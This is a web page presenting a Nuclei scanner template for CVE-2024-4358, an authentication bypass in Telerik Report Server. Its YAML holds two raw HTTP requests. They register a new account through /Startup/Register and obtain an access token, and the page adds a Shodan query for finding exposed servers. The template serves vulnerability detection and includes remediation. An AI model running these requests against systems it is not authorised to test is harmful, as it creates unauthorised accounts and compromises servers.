Skip to content

Progress Telerik Report Server - Authentication Bypass

ID: CVE-2024-4358

Severity: critical

Author: DhiyaneshDK

Tags: cve,cve2024,telerik,progress,auth-bypass,instrusive,kev

In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.

id: CVE-2024-4358
info:
name: Progress Telerik Report Server - Authentication Bypass
author: DhiyaneshDK
severity: critical
description: |
In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later.
reference:
- https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
- https://github.com/sinsinology/CVE-2024-4358
- https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
classification:
cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: title:"Log in | Telerik Report Server"
product: telerik_report_server
vendor: progress
tags: cve,cve2024,telerik,progress,auth-bypass,instrusive,kev
variables:
user: "{{rand_base(6)}}"
pass: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
http:
- raw:
- |
POST /Startup/Register HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}
- |
POST /Token HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
grant_type=password&username={{user}}&password={{pass}}
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "application/json")'
- 'contains_all(body_2, "access_token", "userName", "token_type")'
- 'status_code_2 == 200'
condition: and
extractors:
- type: regex
name: token
part: body_2
group: 1
regex:
- '"access_token":"([A-Z0-9a-z_-]+)"'
internal: true
- type: dsl
dsl:
- '"Username: "+ user'
- '"Password: "+ pass'
# digest: 4b0a004830460221009bf4a18b9493875d3bb57e9e80f718f1d32f9ef9ffdd5e7a15240e523fd681e30221009e398de1ad37b3233eee01bee8fc493d3a1388f46691a8d05af952482b5377c8:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-4358.yaml"

View on Github